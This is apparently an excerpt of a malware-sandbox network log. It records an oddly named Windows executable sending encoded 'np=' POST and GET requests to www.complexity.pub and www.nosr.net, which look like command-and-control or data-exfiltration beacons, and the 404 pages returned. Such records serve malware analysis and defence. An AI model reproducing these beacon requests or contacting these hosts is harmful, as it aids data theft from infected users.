              Sep 18, 2024 09:02:38.238545895 CEST505OUTGET /ujbu/?O4s0=7rrhM&np=MTTknThtRCJj0ATwznqj01o1Cri3+JPfOmsto+GOgM7INhQU0fKKD5oUBTZzolSVFZTYJ8HdpMRBL7zARboLk94tH9MdVpcC/d4hhj8l3F2/cR0CQHBzLt4ZWoJ62kMu+v5Sa8M= HTTP/1.1
              Host: www.nosr.net
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Language: en-US,en;q=0.5
              Connection: close
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Sep 18, 2024 09:02:38.895858049 CEST1236INHTTP/1.1 404 Not Found
              Date: Wed, 18 Sep 2024 07:02:37 GMT
              Server: Apache
              Accept-Ranges: bytes
              Cache-Control: no-cache, no-store, must-revalidate
              Pragma: no-cache
              Expires: 0
              Connection: close
              Transfer-Encoding: chunked
              Content-Type: text/html
              Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
              Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC
              Sep 18, 2024 09:02:38.895900965 CEST1236INData Raw: 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
              Data Ascii: CCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000;
              Sep 18, 2024 09:02:38.895914078 CEST448INData Raw: 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20
              Data Ascii: itional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all;
              Sep 18, 2024 09:02:38.895926952 CEST1236INData Raw: 20 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 61 20 69 6d 67 20 7b 0a 20 20 20 20 20 20 20 20 20
              Data Ascii: a { text-decoration: none; } footer a img { border: 0; } .copyright { font-size: 10px; color: #3F4143; } @media (min-width: 768px) { .
              Sep 18, 2024 09:02:38.895937920 CEST1236INData Raw: 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b
              Data Ascii: 10px; } .status-reason { display: inline; } } @media (min-width: 992px) { .additional-info { background-image: url(data:image/png;base64,iVBORw0KG
              Sep 18, 2024 09:02:38.895950079 CEST1236INData Raw: 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67 43 31 4e 62 59 31 56 53 6b 64 65 42 34 76 58 4d 48 30 4b 53 51 56 49 76 51 66 45 52 63 69 4d 70 63 61 46 74 57 34
              Data Ascii: IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP9Npqv0NKZkS7GuNRQig5pvaYQwdTztjRnCrr/l
              Sep 18, 2024 09:02:38.895962954 CEST672INData Raw: 68 56 41 30 37 59 2b 47 57 4e 4d 4f 42 43 78 49 49 70 43 67 43 70 41 58 35 4b 67 48 42 36 49 51 49 4c 48 77 45 33 48 58 6b 32 58 51 56 73 7a 64 53 6b 47 45 43 6a 55 41 42 68 50 4c 4d 64 54 2f 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56
              Data Ascii: hVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIs
              Sep 18, 2024 09:02:38.895976067 CEST1236INData Raw: 47 69 56 6e 39 59 4e 66 38 62 46 42 64 34 52 55 52 46 6c 57 7a 42 76 79 42 45 71 49 69 34 49 39 61 6b 79 2b 32 72 32 39 35 39 37 2f 5a 44 36 32 2b 78 4b 56 66 42 74 4e 4d 36 71 61 48 52 47 36 31 65 72 58 50 42 4f 66 4f 36 48 4e 37 55 59 6c 4a 6d
              Data Ascii: GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD62+xKVfBtNM6qaHRG61erXPBOfO6HN7UYlJmuslpWDUTdYab4L2z1v40hPPBvwzqOluTvhDBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6h
              Sep 18, 2024 09:02:38.895987034 CEST224INData Raw: 39 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 35 30 25 3b 0a
              Data Ascii: 900%; } .status-reason { font-size: 450%; } } </style> </head> <body> <div class="container"> <secion class="response-info">
              Sep 18, 2024 09:02:38.895998955 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 63 6f 64 65 22 3e 0d 0a 33 37 0d 0a 34 30 34 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73
              Data Ascii: <span class="status-code">37404</span> <span class="status-reason">88Not Found</span> </section> <section class="contact-info"> Please forward this error screen to 1f
              Sep 18, 2024 09:02:38.896019936 CEST783INData Raw: 37 7a 41 52 62 6f 4c 6b 39 34 74 48 39 4d 64 56 70 63 43 2f 64 34 68 68 6a 38 6c 33 46 32 2f 63 52 30 43 51 48 42 7a 4c 74 34 5a 57 6f 4a 36 32 6b 4d 75 2b 76 35 53 61 38 4d 3d 20 28 70 6f 72 74 20 0d 0a 32 0d 0a 38 30 0d 0a 37 33 0d 0a 29 0a 20
              Data Ascii: 7zARboLk94tH9MdVpcC/d4hhj8l3F2/cR0CQHBzLt4ZWoJ62kMu+v5Sa8M= (port 28073) </div> </li> <li class="info-server">107</li> </ul>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.657951217.160.0.127803196C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              TimestampBytes transferredDirectionData
              Sep 18, 2024 09:03:02.057301044 CEST776OUTPOST /4c7j/ HTTP/1.1
              Host: www.complexity.pub
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 207
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.complexity.pub
              Referer: http://www.complexity.pub/4c7j/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Raw: 6e 70 3d 73 70 73 6e 35 38 38 54 47 41 6b 46 6e 77 30 41 31 53 68 69 73 6e 76 6f 56 6e 56 67 38 32 55 30 36 34 55 31 46 35 65 5a 46 41 47 75 44 78 78 53 6c 43 6c 54 48 5a 61 6f 35 6c 63 69 48 39 4a 54 49 69 6f 76 64 72 6d 64 77 55 79 31 6c 47 6c 6c 38 30 71 37 32 30 5a 68 70 4d 61 6f 69 50 6b 50 31 4e 48 73 41 39 58 42 4b 62 43 76 71 59 2f 78 78 46 33 49 51 68 4e 37 2b 5a 45 64 73 42 51 2b 38 2b 6c 79 41 7a 35 71 45 44 4a 4f 73 48 72 38 4a 52 66 63 52 70 50 4f 33 33 68 6e 4e 52 49 35 44 59 34 38 51 76 31 5a 34 66 37 74 65 36 41 64 6c 39 71 4f 73 6c 6c 31 4a 64 6a 52 6e 32 50 31 55 38 5a 75 79 69 64 30 56 55 2b 34
              Data Ascii: np=spsn588TGAkFnw0A1ShisnvoVnVg82U064U1F5eZFAGuDxxSlClTHZao5lciH9JTIiovdrmdwUy1lGll80q720ZhpMaoiPkP1NHsA9XBKbCvqY/xxF3IQhN7+ZEdsBQ+8+lyAz5qEDJOsHr8JRfcRpPO33hnNRI5DY48Qv1Z4f7te6Adl9qOsll1JdjRn2P1U8Zuyid0VU+4
              Sep 18, 2024 09:03:02.686312914 CEST558INHTTP/1.1 404 Not Found
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Date: Wed, 18 Sep 2024 07:03:02 GMT
              Server: Apache
              Content-Encoding: gzip
              Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a [TRUNCATED]
              Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.657952217.160.0.127803196C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              TimestampBytes transferredDirectionData
              Sep 18, 2024 09:03:04.721792936 CEST800OUTPOST /4c7j/ HTTP/1.1
              Host: www.complexity.pub
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 231
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.complexity.pub
              Referer: http://www.complexity.pub/4c7j/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Raw: 6e 70 3d 73 70 73 6e 35 38 38 54 47 41 6b 46 6d 51 6b 41 33 31 39 69 6b 6e 76 72 51 6e 56 67 6c 6d 55 77 36 34 49 31 46 34 71 4a 45 30 71 75 44 51 42 53 6b 47 4a 54 47 5a 61 6f 7a 46 63 6a 4a 64 49 64 49 69 6b 52 64 75 4f 64 77 55 32 31 6c 47 31 6c 38 48 53 36 33 6b 5a 6a 68 73 61 6d 74 76 6b 50 31 4e 48 73 41 39 72 72 4b 62 71 76 71 73 44 78 79 6b 33 50 5a 42 4e 36 32 35 45 64 6d 68 51 79 38 2b 6c 41 41 33 35 51 45 41 39 4f 73 46 7a 38 48 6b 2f 66 49 5a 50 55 6f 6e 67 73 4b 42 4a 71 45 71 77 34 52 74 70 70 68 74 57 50 66 4d 42 48 35 4f 71 74 2b 31 46 33 4a 66 37 6a 6e 57 50 66 57 38 68 75 67 31 52 54 61 67 62 62 74 71 56 49 46 5a 63 56 55 70 44 74 65 51 75 68 76 59 76 50 6f 51 3d 3d
              Data Ascii: np=spsn588TGAkFmQkA319iknvrQnVglmUw64I1F4qJE0quDQBSkGJTGZaozFcjJdIdIikRduOdwU21lG1l8HS63kZjhsamtvkP1NHsA9rrKbqvqsDxyk3PZBN625EdmhQy8+lAA35QEA9OsFz8Hk/fIZPUongsKBJqEqw4RtpphtWPfMBH5Oqt+1F3Jf7jnWPfW8hug1RTagbbtqVIFZcVUpDteQuhvYvPoQ==
              Sep 18, 2024 09:03:05.348718882 CEST558INHTTP/1.1 404 Not Found
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Date: Wed, 18 Sep 2024 07:03:05 GMT
              Server: Apache
              Content-Encoding: gzip
              Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a [TRUNCATED]
              Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.657953217.160.0.127803196C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              TimestampBytes transferredDirectionData
              Sep 18, 2024 09:03:07.261435986 CEST1813OUTPOST /4c7j/ HTTP/1.1
              Host: www.complexity.pub
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 1243
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.complexity.pub
              Referer: http://www.complexity.pub/4c7j/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Raw: 6e 70 3d 73 70 73 6e 35 38 38 54 47 41 6b 46 6d 51 6b 41 33 31 39 69 6b 6e 76 72 51 6e 56 67 6c 6d 55 77 36 34 49 31 46 34 71 4a 45 30 69 75 43 6d 39 53 6c 6e 4a 54 55 4a 61 6f 77 46 63 6d 4a 64 49 51 49 69 38 4e 64 75 4b 6e 77 52 71 31 6b 67 35 6c 2b 32 53 36 35 6b 5a 6a 74 4d 61 6e 69 50 6b 67 31 4d 33 6f 41 39 62 72 4b 62 71 76 71 71 6e 78 6d 6c 33 50 56 68 4e 37 2b 5a 45 42 73 42 51 57 38 2b 63 33 41 33 39 36 45 54 6c 4f 73 6c 6a 38 4b 77 66 66 58 70 50 53 70 6e 67 2f 4b 42 45 79 45 75 70 44 52 73 63 68 68 75 4b 50 66 36 74 66 2b 74 47 43 76 6c 4a 6d 59 39 48 32 6e 32 62 72 59 63 39 5a 67 56 56 52 62 44 2f 45 75 2f 46 44 47 36 63 52 44 35 76 77 59 58 50 52 71 34 32 36 32 79 63 6c 38 66 70 63 54 36 38 39 6b 5a 75 6e 45 32 74 53 53 32 41 73 36 36 68 6a 33 50 31 6c 65 71 4a 61 30 63 72 64 46 49 6e 4d 61 32 78 4f 52 4e 46 6c 54 38 49 61 69 32 59 72 70 2b 68 45 50 62 58 6b 62 30 64 31 45 32 68 41 54 31 6d 36 56 6d 78 49 45 70 42 41 4e 37 48 6b 6c 72 75 2b 6b 76 54 31 6f 42 2b 44 38 57 43 45 67 57 37 [TRUNCATED]
              Data Ascii: np=spsn588TGAkFmQkA319iknvrQnVglmUw64I1F4qJE0iuCm9SlnJTUJaowFcmJdIQIi8NduKnwRq1kg5l+2S65kZjtManiPkg1M3oA9brKbqvqqnxml3PVhN7+ZEBsBQW8+c3A396ETlOslj8KwffXpPSpng/KBEyEupDRschhuKPf6tf+tGCvlJmY9H2n2brYc9ZgVVRbD/Eu/FDG6cRD5vwYXPRq4262ycl8fpcT689kZunE2tSS2As66hj3P1leqJa0crdFInMa2xORNFlT8Iai2Yrp+hEPbXkb0d1E2hAT1m6VmxIEpBAN7Hklru+kvT1oB+D8WCEgW7xhQDsgYzkPHPIk2FvBcCnYfc4tTIsLhccz79vyhkC4kL96WaxRQ5jmx2XokMcc4bZG+iWCKsIXW00+8hBcYaqFJ3JhBwoURFD8ULHrPYxdtt1aKwN88iblAmgNjYHv1HSbiODU+CeboNTBNlFD56j3cXaozjw2CML1pWdNtSpKurXMrkvjhQFEHbNjHqS9yPIRmI4nP6JWcoUnnHqh8TEW0Jyu8TydmghnGb0V2eDzjyOJr4VxL9ZFlXnLhfoHR43WneUgLeVv4Y9QwDR2zt8wp1iBT84A8NQ1JuRbe5afqIpUHkujjIZaeoJUNLm/M+n4VoB0bI6AuFGvYItY4ZBkDBGvZJ1VUag9bSNkVuMRrAAdtTrS+oFPDBbctGF+nZe4FiWYEDshDvXx6aZneyKHrMphWE3wLQojmtWoO7fijvGMQG9CZprjk5SHTpjwjVJB9h2+TdvLXhyzrYegOaWseW5yScfsPLGIX/uKbuH5JtsIJytX0r+bPebDpOyaZRVJW6eg91HoWwV9TqxsX6PbNjAkoAkU1djA4qyzNG2kl/oxDr10w3HEUh92KgCSsb/N1JvG9PyrI1z4IcjymI2npa5xuAaYqRgh5WJ4mTkwMrXCrSS73nuCofENt42ZeMDK0sYkuKn4I+ExBUXKofhEnkovW3oNtX0I [TRUNCATED]
              Sep 18, 2024 09:03:07.910938978 CEST558INHTTP/1.1 404 Not Found
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Date: Wed, 18 Sep 2024 07:03:07 GMT
              Server: Apache
              Content-Encoding: gzip
              Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a [TRUNCATED]
              Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.657954217.160.0.127803196C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              TimestampBytes transferredDirectionData
              Sep 18, 2024 09:03:09.808584929 CEST511OUTGET /4c7j/?O4s0=7rrhM&np=hrEH6McWLCF5pgA68gNL2x/WHVd3zz4Lu443cuDXEGm/YRJcjH1mUpiczm8APdsMFHQVN63ktGuGy3xZxkW74id0uvrTjdsIz/rLBcjWUYSu3cGevEH/eSJ/+YdconAbopgpETc= HTTP/1.1
              Host: www.complexity.pub
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Language: en-US,en;q=0.5
              Connection: close
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Sep 18, 2024 09:03:10.462944031 CEST745INHTTP/1.1 404 Not Found
              Content-Type: text/html
              Content-Length: 601
              Connection: close
              Date: Wed, 18 Sep 2024 07:03:10 GMT
              Server: Apache
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.65795785.159.66.93803196C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              TimestampBytes transferredDirectionData
              Sep 18, 2024 09:03:15.667309999 CEST797OUTPOST /csz1/ HTTP/1.1
